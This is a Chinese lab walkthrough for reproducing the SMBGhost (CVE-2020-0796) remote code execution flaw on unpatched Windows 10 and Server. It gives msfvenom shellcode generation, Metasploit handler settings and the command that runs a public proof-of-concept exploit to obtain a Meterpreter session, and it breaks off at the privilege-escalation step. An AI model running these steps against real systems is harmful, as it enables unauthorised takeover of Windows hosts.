0x00 漏洞描述

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。

CVE-2020-0796 漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。

0x01 影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于x64的系统)
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows Server 1903版(服务器核心安装)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10版本1909(用于基于x64的系统)
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows Server版本1909(服务器核心安装)

0x02 漏洞复现

攻击机IP:192.168.58.134

目标机IP:192.168.58.143

首先下载EXP:

https://github.com/chompie1337/SMBGhost_RCE_PoC

启动msf,使用msf生成shellcode:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

在当前目录生成了一个shellcode.txt:

将其替换之前下载好的SMBGhost_RCE_PoC文件夹中的exploit.py的USER_PAYLOAD:

使用Kali中的msf设置参数,开启监听:

  • msf5 > use exploit/multi/handler
  • msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
  • msf5 exploit(multi/handler) > set rhost 192.168.58.143#设置目标靶机IP地址
  • msf5 exploit(multi/handler) > set lport 3333 #设置监听端口
  • msf5 exploit(multi/handler) > exploit

在Kali中进入SMBGhost_RCE_PoC文件夹,执行exploit.py文件:

python3 exploit.py ­-ip 192.168.58.143

我们已经取得了目标机的Meterpreter会话。简单提权: